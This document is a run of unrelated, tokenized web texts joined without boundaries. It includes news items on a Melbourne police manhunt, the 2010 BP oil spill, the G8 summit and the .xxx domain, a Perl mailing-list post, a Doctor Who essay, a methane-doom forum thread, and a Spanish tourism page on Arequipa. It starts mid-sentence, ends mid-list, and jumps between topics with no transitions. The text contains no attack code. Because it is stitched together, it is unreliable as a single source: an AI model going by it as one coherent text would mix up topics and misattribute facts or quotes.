camera captures an elderly couple hit by the wave and swept away in the current .
Police have found a gun near Rod Laver Arena and established a crime scene as they search for a gunman in Melbourne 's MCG and Olympic Park area following a high - speed chase in the city 's east this morning .
Police have named the suspected gunman as 19 - year - old David Paul Rowntree who they say is known to them and may be dangerous .
The area around the stadiums is no longer cordoned off , but police are urging people who do not have urgent business in the precinct to stay away .
Special Operations
Group officers are patrolling the site but roads have been reopened and train and tram services are getting back to normal after being shut down earlier today .
Earlier , police described the gunman as being aged in his 20s with straight , dark hair and said he was wearing a dark jacket with a red or orange T - shirt and silver trackpants .
They say he is connected to two vehicles stolen in Melbourne 's east , one of which was used in an armed robbery at Bulleen .
Police believe the man has abandoned his vehicle and is now on foot , but they say no shots have been fired .
They warn the suspect should not be approached under any circumstances .
Sergeant Adrian Kelty from the Victoria Police Media
Unit says the man was seen by witnesses , armed with a shotgun .
" At this stage , we 've got the police helicopter and we 've got members on foot and in vehicles , still patrolling the east Melbourne area , " he said .
" We did find a stolen vehicle which was stolen from the Bulleen area earlier this morning .
That 's the vehicle we pursued from the area earlier on [ and ] we found that in the car park of Rod Laver Arena .
" The last sighting of the offender was actually going across the Rod Laver Bridge towards the MCG ... at 10.30 am . "
Superintendent Rod Wilson says the man is known to police and may be dangerous .
" Our units have a good idea who they 're looking for so we 'll obviously keep up that level of commitment in this area throughout the day , " he said .
" Over the next few hours there will be a highly visual police presence , so all I 'm saying to people [ is ] obviously be very careful , if you do n't have to go out , stay indoors , and if you 've got any suspicious behaviour to report , there 's going to be a lot of police patrolling .
" We 've isolated the area and we 'll continue to search for the suspect . "
The Armed Crime Taskforce has now taken over the investigation .
High - speed chase
The search follows a high - speed chase along the Monash Freeway this morning , during which two police cars were rammed by a car with stolen number plates .
Police started following the car in Cookson Street , Camberwell , about 9:30 am AEST , but lost sight of it as it sped onto the Monash Freeway , then Citylink and through the Domain tunnel .
A police officer who was in the car that was rammed on the Monash Freeway has been taken to the Box Hill hospital with back injuries .
A witness , John , says the police cars were badly damaged .
" Just after the Toorak Road turn - off there are two unmarked police cars parked on the right hand side inbound on the Monash , " he said .
" They both seem to have damage from being rammed , and they are being put onto tow vehicles to be towed away . "
HBO will play host to a transatlantic collision of awkward comedy and slightly fictionalized personae next year when Ricky Gervais guest stars on the eighth season of Curb Your Enthusiasm .
As per the show ’s usual secrecy , there have been no details about what will happen next season , or what exactly Gervais will be doing there , other than turning up as himself for at least one episode and , presumably , having an uneasy relationship with Larry David that [ spoiler alert ] probably starts off friendly and quickly turns contentious over some perceived slight or mishandling of a social convention .
Advertisement
Our first solid spoiler for Chuck season 4 is here , courtesy of Ausiello !
The title of the season premiere is “ Chuck vs. the Anniversary . ”
Anniversary of what ?
And for whom ?
Speculate away !
Note : the season 4 premiere date has not been announced , but we suspect it will be either September 20 or September 27 on NBC .
The season 3 on DVD or Blu-ray will be released September 7 in the U.S .
Updated 07.15.10 : NBC just released their fall premiere dates , and contrary to previous rumors , Chuck season 4 is confirmed to debut on Monday , September 20 at 8/7 c . Â
See you there !
Great jobs apartheid : Public sector staff spend nine fewer years at work over lifetime than private employees AND earn 30 % more
Public sector employees work nine years less than their private sector counterparts but are paid 30 per cent more , a bombshell report reveals today .
Extraordinary research tells a tale of two Britains - a state sector awash with taxpayers ' cash while the rest of the economy struggles to stay afloat .
Public sector workers enjoy better pay than those in the private sector , as well as better pensions , shorter hours , and earlier retirement .
Deal : Public sector workers spend less time at work but earn more ( file picture )
Over their lifetimes , those in the private sector work 23 per cent longer - equivalent to an extra nine years and ten weeks - than public sector employees .
This is thanks to a combination of shorter hours , more time off and earlier retirement .
The findings explode once and for all the old idea that public sector workers have better job security and gold - plated pensions because they have lower salaries .
They will be seized on by the Coalition Government , which has warned that the bloated state sector has been artificially insulated from the recession and is in line for massive spending cuts .
The report , by centre - Right think tank Policy Exchange , also found that the chance of being made compulsorily redundant in the civil service is an astonishing 0.00007 per cent .
Generous pension schemes in the state sector are now worth up to 15 per cent on top of salary , the report says , while public sector pay costs have soared by more than a third in real terms over the last seven years - three times faster than in the private sector .
The report uses figures from the Office for National Statistics to show that more than seven million people are now employed in the public sector , over a million more than official figures suggest .
And £ 4 billion more is spent on marketing , PR , customer service and office managers ' jobs in the public sector than in 2002 .
Policy Exchange director Neil O'Brien said : ' Under the last government the pay bill got totally out of control , increasing three times faster than in the private sector .
Pay spiralled even though productivity was collapsing .
' We should freeze the public sector pay bill in cash terms for the next four years , taking the pay bill back to where it was in 2003 in real terms .
We should also follow the example of Ireland and other European countries , and ask public sector workers to pay some more towards their pensions . '
The report says median gross pay is now £ 22,417 in the public sector and £ 19,932 in the private sector .
It adds that between 1997 and 2007 public sector productivity fell , while productivity in the private sector increased by nearly 28 per cent - leaving the former only two - thirds as productive as the latter .
Between 2002 and 2009 , the number working in the public sector increased nearly five times more quickly than numbers in the private sector .
The report says that on an hourly basis , the typical public sector worker is 30 per cent better paid than their private sector counterpart .
Before 1997 , when Labour came to power , private and public sector salaries rose at similar rates .
But between 2002 and 2009 , typical pay grew 86 per cent faster in the public sector , partly funded by additional public spending .
Meanwhile , real earnings for private workers have been largely stagnant since 2002 .
Between 1997 and 2008 the proportion of public sector workers without any pension provision from their employer fell from 21 per cent to 16 per cent .
However , in the private sector the same figure rose from 54 per cent to 63 per cent .
While the proportion of public sector workers in generous defined - benefit schemes has risen , the number in the private sector has progressively declined - to just 8 per cent of the workforce compared to 80 per cent in the public sector by 2007 .
The report says gold - plated public sector pensions - which have been targeted by the Government for cuts - are worth between an extra 12 per cent and 15.6 per cent of total salary .
Ministers are next week expected to announce a major review of public sector pensions after the independent economic watchdog warned their cost will more than double by 2014 .
Today 's report also highlights the generous redundancy payments in the civil service .
Civil servants over 50 qualify for compensation of three years ' pay , funded by the taxpayer , while those who joined before 1987 can qualify for six - and - a - half years ' pay , on top of their pensions .
TUC General Secretary Brendan Barber said it was ' impossible ' to accurately compare private and public sector pay because of the higher number of skilled and professional workers and differences in the nature of jobs .
He said the report used ' deliberately misleading ' figures and painted ' every nurse , every doctor , every teacher as a drag on the economy ' .
p5 on the JVM
From : Ben Evans
Date : August 21 , 2009 00:23
Subject : p5 on the JVM
Message ID : 38a53eb30908210023w3743b901ydc364017286ab89a@mail.gmail.com
August 21 , 2009 00:23p5 on the JVM
Hi ,
As quite a few of you are aware , a few of us have been working on approaches to putting perl5 on top of the JVM .
We 've decided to call it quits , but I did n't want to just disappear without explaining a little .
First off , it was a very enjoyable exercise ( and very informative for those of us working on it - just sorry we could n't provide more useful artifacts for people not on the project ) .
Secondly , we would strongly recommend that anyone who feels tempted to give this another go read some of our meagre outputs , and perhaps contact one of us .
Thirdly , in many ways , I was surprised by how much could be done .
Code generation is eminently possible , and while far from perfect , the JVM really is changing to fit the needs of more dynamic languages , ( eg the forthcoming version 3 of the JVM spec is now totally decoupled from the Java language - the only linkage they are supposed to share is the .class format ) and a lot of smart people are working hard to make that happen .
The problem with Perl is parsing .
In particular : Nullability - http://www.perlmonks.org/?node_id=663393
-
I 'm not sure I 've fully grasped the full details of Jeffrey 's argument as it related to Halting yet , but the basic point about nullability as discussed by him ( and originally , I believe , Randal ) stands as a big parsing problem .
This combination of the language features - " does not require function prototypes " and " does not require brackets round function - call arguments " is not a happy one , from the point of view of static analysis .
In my view , Perl further complicates this with the form of LIST which does not ( always ) require brackets round it , and possibly the comma operator 's behaviour , but that 's somewhat off topic .
Lack of clean separation between parsing phases .
This is more a problem for the automated parser - generator tools , but it does hugely increase the amount of work required to build an alternative implementation of Perl 5 .
If we can't really meaningfully use the existing ( and extremely powerful ) tools , then we 're back to hand porting the parser components from C to Java ( or bytecode ) .
That 's a huge barrier to entry .
It 's not insurmountable , the Ruby people did it , but it was a lot of work for them , and their community was , shall we say , somewhat more amenable to there being multiple implementations .
Existing syntax missteps - Indirect object syntax , lack of clarity of BLOCK vs SUBREF vs closure and grep / map syntax all deserve a mention here .
Now , I realise that all of these are too deeply ingrained to be fixed , so I 'm not proposing that we do .
I 'm just pointing out how these language features , some of which have much broader use cases than the problem they were intended to solve , interact to basically make non-heuristic parsing and all forms of static analysis ( that I can think of ) basically impossible .
So , those are all the reasons we stopped - too much would have to change in order to make a different implementation possible , and we felt that there would be too much ill - feeling generated if we were to seriously propose it .
I guess the next question is , does it matter ?
To me , I think it does .
You may , of course , disagree , but here 's why I think so .
My interests have , for quite a while now , been in languages which are safe enough for day to day use by developers of average ability , but with features that should provoke curiousity and which contain a very large amount of expressive power if one knows how to use it .
For many years , that language was Perl for me , and I find it sad that just as a new generation of developers discover functional aspects , and as improvements in chip design force us to reconsider parallelism abstractions - and I firmly believe that the thread paradigm is fundamentally * not * safe enough for the avergae developer to be using on a day - day basis - that Perl 's relevance in that arena should be fading , due to being trapped in its ' implementation .
So there we are .
Thanks to everyone who helped out - James Laver , Ovid , Shevek and co. Ben
Just in case you were worried about the super - rich , do n't .
Great Recession ?
What recession ?
The world ’s millionaires and billionaires — now totaling 10 million — saw their overall wealth jumped 18.9 percent last year , to $ 39 trillion .
The surge in the stock market in 2009 restored many people back to the ranks of the rich as the financial crisis abated .
The number of people with at least $ 1 million in assets beyond their homes and household goods climbed 17 percent , according to a report on the world ’s wealth by Merrill Lynch and Capgemini , a Paris - based business consulting firm .
Their total wealth approached the 2007 peak of $ 40.7 trillion , after a 20 percent plunge to $ 32.8 trillion in 2008 ....
As expected , the most millionaires could be found in the United States , where their ranks rose 16.5 percent , to 2.87 million , last year , according to the report .
Their total wealth in North America rose 17.8 percent , to $ 10.7 trillion .
Meanwhile :
It 's been a full three weeks since lawmakers failed to reauthorize extended unemployment benefits , to prevent a 21 percent pay cut to doctors who see Medicare patients and to provide states with $ 24 billion in Medicaid assistance .
The House passed a bill at the end of May , but the Senate adjourned for its Memorial Day recess without acting .
Since then , Senate Democrats have been unable muster the 60 vote supermajority needed to get the legislation done .
Meanwhile , 903,000 people jobless through no fault of their own have missed unemployment checks and doctors are getting shorted for taking care of old folks ....
Sen. Olympia Snowe ( R - Maine ) told reporters she 's been talking with Reid and Baucus about using unspent stimulus funds ( which Democrats have argued are already dedicated to other projects ) to offset a portion of the $ 24 billion in enhanced Federal Medicaid Assistance Percentages ( FMAP ) , which various state governors have said are urgently needed to prevent massive public sector layoffs .
The nonpartisan Center on Budget and Policy Priorities estimates that without the FMAP money , states will be forced to fire 900,000 workers .
Sen. Susan Collins ( R - Maine ) said she was discussing ways to phase out the FMAP funding so that states do n't face a sudden drop - off .
Snowe said she would not insist that the unemployment benefits -- which will cost more than $ 30 billion -- be paid for .
" I think the economy has not demonstrated the capacity to create jobs , " she said , " so I think it 's our burden to turn that around , not to foist that on those who are unemployed and dependent on unemployment benefits . "
Some Republicans and Democrats in both the House and Senate have said they believe it is , in fact , time to foist that burden onto the unemployed , who they suspect are n't finding jobs because they 'd rather collect benefits than look for work .
Last night , Senators Stabenow , Casey , Merkley , and Whitehouse led an effort of Dem Senators on the floor in an attempt to push passing , at least , unemployment benefits .
Republicans , of course , objected .
None of them -- Snowe included ( she wants to see the few revenue raisers in the bill removed ) -- suggested that those people for whom the recession is emphatically over , to the tune of $ 10.7 trillion , pitch in .
( CNN ) --
A new flow of oil emerged from BP 's damaged undersea well in the Gulf of Mexico on Tuesday evening after a remote - controlled submarine successfully cut into the well 's riser pipe .
BP used robots in its latest attempt to curtail the flow of crude from the largest spill in U.S. history , which spread to barrier islands off Alabama and Mississippi on Tuesday .
When the robot submarines cut into the undersea well 's riser pipe , a fresh spew of oil temporarily obscured the view of the mechanical arm .
The cut was a first step toward placing a cap over the well that has spewed hundreds of thousands of gallons of oil into the Gulf of Mexico every day since late April .
BP expects to make more cuts to the riser before bringing in a diamond saw to make a clean cut where the cap will be fitted .
Doug Suttles , the company 's chief operating officer , told CNN's " John King USA " that the procedure should collect the " vast majority " of the oil if it succeeds .
" We 'll be putting the cap assembly , loading that out and sending it to the sea bed later tonight , " Suttles said .
" We should be able to install this tomorrow .
And hopefully by late tomorrow or Thursday , we should have this thing operating . "
But the operation carries the risk that the flow of crude from the ruptured well could increase by up to 20 percent once the damaged riser is cut away .
The job already has been complicated by pipework around the well that has had to be removed before massive metal shears could be brought to bear Tuesday evening , Suttles said .
The gusher may not be shut down until August , when BP expects to complete relief wells that will take the pressure off the one now spewing into the Gulf .
The 5,000 - foot - deep well erupted after an explosion and fire aboard the Deepwater Horizon drilling rig on April 20 .
The rig sank two days later , taking 11 men with it and leaving up to 19,000 barrels ( 798,000 gallons ) of oil pouring into the Gulf , according to federal estimates .
After fouling sections of Louisiana 's marshes over the past two weeks , the oil was spreading toward the northeast on Tuesday .
Tar balls and patches of reddish - brown " weathered " oil came ashore on Dauphin Island , Alabama , south of Mobile , and on Mississippi's Petit Bois Island , off Pascagoula , authorities reported .
Oil hits Alabama , Mississippi barrier islands
More than a dozen miles offshore , researchers from the Dauphin Island Sea Lab reported seeing more rust - colored swaths of oil spattering the surface of the Gulf .
They ranged from the size of half - dollar coins to 30 or 40 feet long , said John Dindo , the laboratory 's associate director .
BP 's handling of the spill has been sharply criticized by members of Congress , officials in the Gulf states and the Obama administration , which announced Tuesday that a criminal investigation of the spill was under way .
In addition , federal officials will no longer hold joint news briefings with the company , the administration announced .
Coast Guard Adm .
Thad Allen , the government 's point man on the spill , will now become the face of the response effort .
Allen told reporters in New Orleans , Louisiana , that his job is to speak " very frankly with the American public . "
Rear Adm. Mary Landry , who has been the Coast Guard 's on - scene coordinator for five weeks , will be returning to her duties as chief of the service 's New Orleans district office .
Allen praised Landry 's work leading " an anomalous and unprecedented response " to the spill , but said Landry now needs to focus " on the larger array of threats " to her district -- including this summer 's Atlantic hurricane season , which began Tuesday .
In Louisiana , Plaquemines Parish President Billy Nungesser warned that a hurricane in the area could drive more oil ashore .
" We do n't want to scare anybody , but we need to be realistic about it , " Nungesser said .
" If a storm does top out levees , it will probably bring oil with it . "
He said residents who evacuate ahead of a hurricane might return " not to a flooded home , but to a home that is completely contaminated with this oil . "
Oil spill darkens hurricane fears
Tuesday also marked the start of the recreational fishing season for red snapper , a big draw for sport anglers in the region .
But the season opened with a new blow to the region 's fisheries industry as the National Oceanographic and Atmospheric Administration extended its restrictions on fishing to almost a third of the Gulf .
The closures extend southward to a point about 240 miles west of the tip of Florida and eastward to federal waters off the Alabama - Florida state line .
The state of Mississippi announced a closure of some of its inland waterways to fishing after oil was found in the area .
The closed area includes areas east of 88 degrees , 40 minutes west longitude , and south of the CSX Railroad , but not including Graveline Bayou and its tributaries .
After a meeting with state attorneys general and federal prosecutors from Louisiana , Alabama and Mississippi , U.S. Attorney General Eric Holder told reporters that the Justice Department was looking at possible criminal violations in connection with the spill .
Justice Department launches investigation
" If we find evidence of illegal behavior , we will be forceful in our response , " Holder said .
" We have already instructed all relevant parties to preserve any documents that may shed light on the facts surrounding this disaster . "
In a statement issued in response to Holder 's announcement , BP said it would cooperate with any inquiry , " just as we are doing in response to the other inquires that are already ongoing . "
Suttles told CNN that there have been " very few differences " between company and federal officials working to cut off the spill .
" This is a team that 's really all aligned on the same goals and has been since the beginning , " he said .
" The government clearly presses us very hard to make sure we 're responding as quick as we can .
We 're moving things forward , we 're applying all the resources that we need to apply .
But I would stress at the working level , those differences are really quite small . "
BP , rig owner Transocean Ltd. and oilfield services company Halliburton have blamed each other for the disaster .
But BP , as the well 's owner , is responsible for the costs of the cleanup under federal law , and Suttles said the company has now spent more than $ 1 billion to clean up the oil .
BP stock has taken a beating on Wall Street , plunging on Tuesday after the failure of last week 's " top kill " attempt to close the well .
The company 's stock value is down more than a third since the spill began .
CNN 's David Mattingly , Tracy Sabo , Patrick Oppmann , Scott Bronstein and Aaron Cooper contributed to this report .
by K. Tempest Bradford
Warning , this column has spoilers for Doctor Who season 4 , including the two final episodes .
This year at WisCon , the feminist science fiction convention , I was on a panel called Martha Jones : Made of Awesome or Disappointing Stereotype ?
I had hoped we would explore the different fan reactions to the way the writers handled Martha ’s character , story arcs , and race .
The panel did n’t turn out as I expected , but something Chris Hill said sparked a thought .
He mentioned feeling that the Doctor ’s character was uneven–sometimes he ’s incredibly cruel and judgmental and other times he ’s compassionate and reluctant to do harm .
My response was that I did n’t see this as unevenness , I saw it as purposeful part of his character .
I truly feel , particularly after the events of Season 4 , that the writers want us to think that the Doctor is a complicated and deeply flawed person .
He is , to be blunt , a jerk .
The Doctor may not recognize this about himself , but judging from the interviews contained in the Doctor Who : Confidential episodes , the writers and the actor do .
I ’d go so far as to say that they expect the audience to feel this way , too .
Not that they want the viewers to hate the Doctor , but to understand that , for all his running around the universe and time making things ‘ better ’ , he is n’t always right .
That ’s what makes him such a great character and hero–he ’s as flawed as we are and has just as much trouble admitting that to himself and others .
In Season 3 , the Doctor sometimes acts horribly to Martha .
Fans pointed out his propensity to yell at or speak harshly to her , his initial “ just one trip ” nonsense , and the complete thoughtlessness in bringing her to pre-WWI England ( where her life would be far more complicated by her race ) when he was hiding in “ Human Nature ” .
In the last episode , he recognizes that but never verbally acknowledges it .
It is n’t until Season 4 when he tells Donna how things went wrong with Martha and that it was all his fault that the viewers get solid confirmation that he understood that at all .
Unfortunately , he did n’t say it to the person it affected .
He fixes Jack ’s wristband so he can hop through time and teleport in “ The Sound of Drums ” , but in the end of season 3 ( and again in season 4 ) he takes that ability away claiming that “ I ca n’t have you running around with a teleporting time machine . ”
Why not , exactly ?
Why is the Doctor the only one allowed to travel through time at will ?
There he goes being a jerk again .
In the very first episode after the Doctor ’s regeneration into # 10 ( David Tennant ) he accuses Harriet Jones of committing genocide as if that ’s something he would never do .
We know better .
Even Rose knows better , though she gives Harriet an evil look , too .
And for a moment , even I was tisking her .
But just for a moment .
My initial instinct to side with the Doctor ( before realizing he was being a huge hypocrite ) is probably shared with many viewers .
He is , after all , the hero of the show .
He , very often , is an exemplar of what we should aspire to–bravery , intelligence , compassion , willing to do and stand up for what is right .
American audiences , especially , are used to feeling that whatever the hero / heroine or protagonist of a story feels is right and correct , the writers are saying we should also feel is right and correct .
However , what if that was n’t the case ?
What if , instead , the writers are presenting us with a character that we are n’t always meant to agree with ?
Perhaps I ’m giving the Who team too much credit , but I think they are trying to create a character that has depth and flaws but is not all flaw and wrongness .
That would be too easy and not nearly as interesting .
Look at the scene in “ Journey ’s End ” ( Season 4 finale ) when Davros points out that the Doctor has turned all of his companions into weapons .
“ They ’re trying to help , ” the Doctor said , weakly defending himself , but he knew Davros was right .
That countless people had died , sacrificed , and killed in his name .
Yes , many of them were better people because of it .
Rose realized a potential she might never have if not for her traveling ;
Jack was a coward and a con artist , now he ’s a hero of a different mold ; Martha was already going places , but her experiences opened up avenues she would never have known existed .
But still , when Davros called him “ the man who keeps running , never looking back , because he dare not .
Out of shame , ” he was n’t wrong .
When Russell T Davies wrote that , he was n’t just creating some standard villain - speak .
He was showing viewers the kind of character he ( and the other creative team ) created and saying : I meant to do that .
And even though the Doctor ’s soul is laid bare by one of his greatest enemies so that he can’t help but face it , he keeps on being who he is .
Doctor - clone has to go off to an alternate universe because “ he ’s too dangerous to be left on his own . ”
And who would know better ?
Passing judgment on himself is so meta , and yet oddly appropriate .
It could be said that the Doctor was so tired of seeing the truths about himself that having a mirror of that around would have driven him off the deep end .
But what he does next is , to many fans , inexcusable .
He takes away Donna ’s memories of him and everything she ’s done since she landed in the TARDIS on her wedding day in order to ‘ save ’ her .
And he does this against her stated will .
No matter how much the Doctor might say that he did it for her own good so that she would n’t die , Donna said ‘ no ’ knowing that it meant her death .
Anything was better , she felt , than going back to the way she was before .
And the Doctor did it anyway .
Because that ’s the kind of man he is .
It was a selfish thing to do .
And confirms that , despite everything else that happened in the episode , he would remain who he was : a wonderful , amazing , selfish , thoughtless man burdened by survivor ’s guilt and crushing loneliness .
The destroyer of worlds .
It ’s no excuse for acting like a jerk , sometimes , but it ’s certainly a reason .
K. Tempest Bradford has an unhealthy obsession with the Whoniverse and has seen the final three episodes of season 4 far , far too many times .
Enjoyed this article ?
Consider supporting us via one of the following methods : Buy eBook SubscribePatreon
Tales of Your Choice
Vote on the active poll to determine the story 's progression !
Image caption Critics argue a .xxx domain will create a cyber red - light district
Official approval has been given for the creation of an internet domain dedicated to pornography .
The board of net overseer Icann gave initial approval for the creation of the .xxx domain at its conference in Brussels .
Icann 's approval will kick off a fast - track process to get the porn - only domain set up .
ICM Registry , which is backing the domain , said .xxx would make it easier to filter out inappropriate content .
The decision ends a long campaign by ICM Registry to win approval .
Stuart Lawley , chairman of ICM , welcomed the decision and said it was " great news for those that wish to consume , or avoid , adult content " .
Porn police
Icann , the Internet Corporation for Assigned Names and Numbers , said the next step would be talks with ICM Registry to ensure that it still had sufficient backing from the adult industry to justify its creation .
Icann oversees the net 's addressing system and demands that new top level domains , such as .biz , must be " sponsored " in that they must serve the needs of a defined community .
ICM has said it expected the first .xxx domains to go live in early 2011 .
It said it had more than 110,000 pre-reservations for .xxx domains .
During the debate on approval , Icann board members said mistakes had been made in denying approval before now .
The denial was " not consistent with the application of neutral , objective and fair documented policy " .
Some board members said they were personally " uncomfortable " with the decision to approve .xxx but could not block it because ICM had followed Icann 's rules for setting up a new top - level domain .
Initial approval for .xxx was given in 2005 but this was rescinded following protests from politically conservative groups .
Icann also said it was worried that it would be asked to police content - a role it was not created for .
In February 2010 , a panel of US judges said Icann erred in denying the approval of the domain .
Icann accepted that ruling and began a public consultation process on whether the domain should be approved .
Be it because you have no friends , or simply no friends , Apple 's got your back if you 're looking for a chum to test that curiously intriguing FaceTime feature .
Just dial up 1 -888 - FACETIME
( after cleaning yourself up a bit , of course ) and hang tight , as a dapper Apple employee will be there in a moment to " show you the basics and a few advanced tips . "
And do n't even try any of those late night shenanigans -- the help line 's only open from 8 AM to 8 PM CDT .
[ Thanks to everyone who sent this in ]
According to oceanographer John Kessler the methane levels in the oil coming from the sea floor now are at 40 % compared to the normal 5 % found in typical oil deposits .
Associated Press Writers= NEW ORLEANS ( AP ) —
It is an overlooked danger in oil spill crisis :
The crude gushing from the well contains vast amounts of natural gas that could pose a serious threat to the Gulf of Mexico 's fragile ecosystem .
The oil emanating from the seafloor contains about 40 percent methane , compared with about 5 percent found in typical oil deposits , said John Kessler , a Texas A&M University oceanographer who is studying the impact of methane from the spill .
That means huge quantities of methane have entered the Gulf , scientists say , potentially suffocating marine life and creating " dead zones " where oxygen is so depleted that nothing lives .
" This is the most vigorous methane eruption in modern human history , " Kessler said .
source
A new article out today might inadvertently add some weight to Richard Hoagland 's claim / theory / rumour of a methane bubble under the sea waiting to explode on some Armegeddon - type level .
...?
Here 's the full article , which does n't talk about what Hoagland does but discusses another potential doom scenario ..._______________________________________________________________As
you can imagine this is being discussed on many forums , and on one I found a post from someone who put together a list of methane - connected events occuring in the past two months alone .
Here is what they wrote : Gulf disaster - METHANEColumbia mine disaster - METHANEW .
VA Massey Mine explosion - METHANEMexico explosion cause mile - long crack - METHANE translate.google.com ...
=enCT Kleen Energy massive explosion , killing many - METHANETexas natural gas refinery explosion - METHANEThere are more examples from the last 8 weeks or so , but you get the idea .
Is it any surprise that one of the original apocalypse movies featured METHANE ?
" Mad Max " Thunderdome " lol .
I never forgot that .
Methane .
It all comes down to that .
______________________________________Coincidence , or connected .............?[ edit on 18/6/10 by cosmicpixie ] [ edit on 18/6/10 by cosmicpixie ] [ edit on 6/18/10 by niteboy82 ]
Image caption President Obama : " There has to be consequences "
US President Barack Obama has said North Korea must be " held to account " for the sinking of a South Korean warship .
He said he stood with South Korean leader Lee Myung - Bak , and condemned Pyongyang 's " irresponsible behaviour " .
His comments came shortly after the G8 group of industrialised nations meeting in Toronto condemned the sinking of the corvette Cheonan earlier this year .
North Korea has denied attacking the ship .
An international investigation concluded that it was sunk by a North Korean torpedo .
After meeting the South Korean leader on the sidelines of the summit , Mr Obama said : " There has to be consequences for such irresponsible behaviour . "
The G8 leaders also criticised North Korea - and Iran - over their nuclear activities , and they described the Israeli blockade of the Gaza Strip as " not sustainable " .
And they admitted that the global financial crisis had compromised efforts to meet UN targets for reducing world poverty .
Canada is also hosting a summit of the wider G20 group of industrial and developing powers , which will will discuss the global economy and financial reform .
Thousands of demonstrators marched on the G20 summit on Saturday in what is being reported to have been a largely peacefully rally that saw outbreaks of violence on its edges .
These saw groups of young men scuffle with riot police and set fire to at least two patrol cars .
Security concerns
In their final summit statement , the G8 - the US , Canada , Germany , UK , France , Italy , Russia and Japan - said : " We deplore the attack on 26 March that caused the sinking of the Republic of Korea 's naval vessel , the Cheonan , resulting in tragic loss of 46 lives . "
Noting that an international investigation had found that , despite its denials , Pyongyang was to blame for the attack that sank the warship , the statement adds : " We condemn , in this context , the attack which led to the sinking of the Cheonan .
" We demand that the Democratic People 's Republic of Korea refrain from committing any attacks or threatening hostilities against the Republic of Korea . "
Reuters news agency says the statement was not as strongly worded as some nations , including the United States , had hoped .
It says Russia was said to have held out against stronger language .
The statement also expresses the G8 leaders ' " gravest concern that the nuclear test and missile activities carried out by the Democratic Peoples ' Republic of Korea have further generated increased tension in the region and beyond , and that there continues to exist a clear threat to international peace and security . "
The document calls on Iran to carry out a " transparent dialogue " over its controversial nuclear programme .
" We are profoundly concerned by Iran 's continued lack of transparency regarding its nuclear activities and its stated intention to continue and expand enriching uranium , " it says .
The UN Security Council earlier this month approved a fourth round of sanctions against Tehran for failing to halt nuclear enrichment .
The measures include tighter finance curbs and an expanded arms embargo , but not the crippling sanctions the US had wanted .
On Gaza , the communique says the G8 leaders " deeply regret " the loss of life and injuries in the aid flotilla that was stormed by Israeli commandos last month as it was approaching the Palestinian territory .
Nine Turkish activists died on board the flotilla 's main ship .
In a reference to the Israeli blockade of the Palestinian territory , which is controlled by Islamist group Hamas , it says : " We urge all parties to work together ... to ensure the flow of humanitarian and commercial goods and persons , to and from Gaza .
The current arrangements are not sustainable and must be changed . "
Poverty of ambition
The grouping concedes that the global economic crisis had jeopardised the chances of meeting the UN 's development goals by the target year 2015 , and that renewed aid commitments are necessary .
STEPHANOMICS
The argument over the right way to support the global recovery here at the G20 summit in Toronto is the mirror image of the debate at the London Summit last year Stephanie Flanders Damned if they do
It says supporting development remains a cornerstone of the G8's approach , and that the countries will meet their obligations .
But BBC diplomatic correspondent Bridget Kendall , in Toronto , says that unlike last year , the G8 has sidestepped any mention of the aid targets they set themselves five years ago at their Gleneagles summit , some of which have still not been met , and focused instead on maternal health and child mortality .
On Friday , the G8 agreed to donate $ 5 bn ( £ 3.3 bn ) over five years towards improving the health of mothers and young children in the developing world .
Our correspondent says that the immediate response from aid agencies has been dismay , and that they have accused G8 leaders of moving from " ambition on poverty in 2005 to poverty of ambition in 2010 " .
Efforts to bridge differences over budget policy dominated Friday 's talks before Saturday 's discussions on global security .
The twin summits , being held in and near Toronto , have come at a time when largest economies are divided over whether to cut deficits or stimulate economic growth .
President Obama is worried that a series of austerity measures announced by European countries may delay global recovery .
The G8 leaders will be joined by China and other rising economic powers for the G20 summit .
Mr Obama has called for the group to pull together to promote economic growth , saying that world economies are " inextricably linked " .
BBC economics correspondent Andrew Walker says there is a dilemma for the group on the best timing for fixing debt problems .
Anarchist mobs protesting the G - 20 summit smashed and looted stores in Toronto last weekend .
One of their targets : American Apparel .
A tipster sent us these photos of the demolished AA store — one more after the jump .
That 's uncalled for .
You kids would never get hired in those outfits , anyhow .
[ Previous American Apparel coverage here . ]
TORONTO — Canada is pulling out all the stops to make sure the world 's leaders are safe this weekend at the Group of Eight and Group of 20 summits the country is hosting .
For the city of Toronto , the hub for both meetings , that has meant turning downtown into a veritable fortress for much of the week preceding the June 25 - 27 events , complete with hurricane fencing , shuttered banks and boarded - up sculptures .
Downtown businesses urged employees to stay away or work from home over the past few days .
There ...
Información de arequipa
El origen del nombre de Arequipa tiene varias teorías fundamentadas en una de ellas nos dice que proviene de la lengua aymara donde “ Ari ” significa cumbre y “ Quipaya ” detrás los cuales se dicen harían señal al volcán del Misti , la segunda teoría toma el quechua “ Ari-que pay ” el cual traducido es “ Si quedaos ” , finalmente Inca Garcilaso de la Vega dijo que provendría del aymara “ Ari Qquepan ” siendo su significado Trompeta Sonora el que sería un caracol marino conocido por los nativos del lugar tomando a Mayta Capac como fundador .
Viene a ser considerada la segunda ciudad más importante del Perú , se le conoce como ciudad blanca por muchos esto se debe al sillar utilizado para las construcciones coloniales , pero también es debido a la colonización de los españoles y la gran mayoría de habitantes desde esa época de tez blanca .
Datos importantes
Fue fundada un 15 de agosto del año 1540 por Garci Gabriel de Carbajal .
Su altitud media es de 2335 msnm .
Tiene una superficie de 3057 kilómetros cuadrados como ciudad .
La población de la ciudad es de 1008290 y la densidad poblacional de 1551,22 habitantes por kilómetro cuadrado .
Se les conoce con el gentilicio de Arequipeños .
Para hacer llamadas telefónicas se usa el prefijo 054 antes de un número fijo .
Lugares turísticos de Arequipa para visitar
En conjunto el departamento de Arequipa tiene muchos sitios para poder visitar ya sean del tipo cultural , naturales o construcciones históricas estos son muy variados .
Recordemos que la cantidad de volcanes en el departamento es la más numerosa del país y su riqueza natural también es muy grande .
1.- Plaza de Armas
Las plazas principales de cada ciudad son uno de los mayores atractivos turísticos , en este caso podemos encontrar a su alrededor numerosas construcciones muy vistosas como son La Catedral con su museo , iglesia La Compañía , iglesia Nuestra Señora de la Merced y los portales .
2.- Catedral de Arequipa
Es la principal edificación de la religión católica en el departamento , se inicio su construcción el año de 1540 y se finalizo en 1656 .
Dentro de esta podemos encontrar un museo con bastos objetos religiosos históricos , como bien se sabe la mayoría de construcciones están echas mayormente por sillar de la región .
3.- Iglesia La Compañía
Ubicada en lo que se conoce como el centro histórico de Arequipa es una construcción histórica del estilo barroco que desde la fachada ya es bien vistosa , contiene numerosas piezas de la historia de la región desde su construcción que se empezó en 1590 y termino en 1698 .
4.- Monasterio de Santa Catalina
